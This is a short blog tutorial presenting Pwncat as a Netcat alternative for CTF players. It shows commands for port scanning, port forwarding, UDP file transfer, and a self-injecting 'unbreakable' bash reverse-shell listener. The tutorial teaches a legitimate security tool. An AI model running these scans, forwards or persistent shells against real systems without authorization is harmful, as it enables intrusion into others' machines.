INTRO
Netcat is called swiss army knife in the field of hacking. You can start, listen, check ports and services on any host via Netcat. Netcat is available on Linux, Windows and Mac. Netcat can be run via its small binary files. it gets important in CTF challenges often.
Netcat gives you a simple command-line interface. Even Netcat has its own Python library. you can install it via this command:
pip install nclib
But, is there any alternative we have for Netcat? are we supposed to always use this tool in every situation? well, it’s not true. we have a tool named “Pwncat”. I think it is better than the Netcat. but it is all your choice to use whatever you want. but using Pwncat has its own advantages.
Pwncat has its own website which is a little bit dark, I guess. check it out –> CLICK HERE
Pwncat is an opensource project. so, you can easily contribute to it. this page has all functions which are used by Pwncat. the developer has organised it very well, you can take a look at that.
ATTACK
To use Pwncat, you will need to install it first. you can install it via pip in Linux. type this command to install Pwncat in Linux:
pip install pwncat
but if you are using Mac OS, you can install it via brew command too. Type this command to install it in Mac OS:
brew install pwncat
Screenshot:
you must get some other output if you haven’t installed it already.
Syntax of Pwncat is much similar to Netcat. you can try to connect with any other host. type this command:
pwncat <host> <port>
and if the host is unavailable it will show you a beautiful error in red color.
Screenshot:
You can do a TCP port scan via Pwncat, Type this command:
pwncat -z <host> 1-1000
-z stands for zero mode. it means that Pwncat will connect to the endpoint of that service but will not establish a connection. and we have given the range of ports to scan(1-1000).
Screenshot:
well, not just TCP ports. even you can scan UDP ports. type this command:
pwncat -z <host> 1-1000 -u
The best feature I saw in this tool is port forwarding. You can do local and remote port forwarding of any port to any host. and syntax for this is so easy.
you can use local port forwarding to host someone’s services on your IP. but let me tell you something important before doing that if you are using this on some website which doesn’t allow you to access via its real IP, you won’t be able to proceed. you can simply test it on our website.
However, this is the syntax for Local Port Forwarding:
pwncat -L 0.0.0.0:<Local-Port> <Remote-Host> <Remote-Port>
this command will present the remote port which is running on the remote host on your localhost.
there is an option for remote port forwarding too. it means that you can forward the local port (running on your localhost) on the remote host. check it out here
you can send and receive files via this awsome tool with UDP protocol. Type this command:
pwncat -u -l 1234 < upload.txt pwncat -u localhost 1234 > download.txt
There is one more great feature for all CTF players. have you ever lost your remote shell mistakenly by pressing CTRL-C? well, that’s what makes me lose my temper sometimes. with Pwncat you can spawn an unbreakable shell. type this command to start to listen for unbreakable shell:
pwncat -l <lisitening-Port> --self-inject /bin/bash:<Self-IP>:<Self-Port>
It seems complicated that’s why they have explained this command in a YouTube video. and I think that it would be much better to watch the video rather than explaining more things here by me.
Thanks For Visiting.
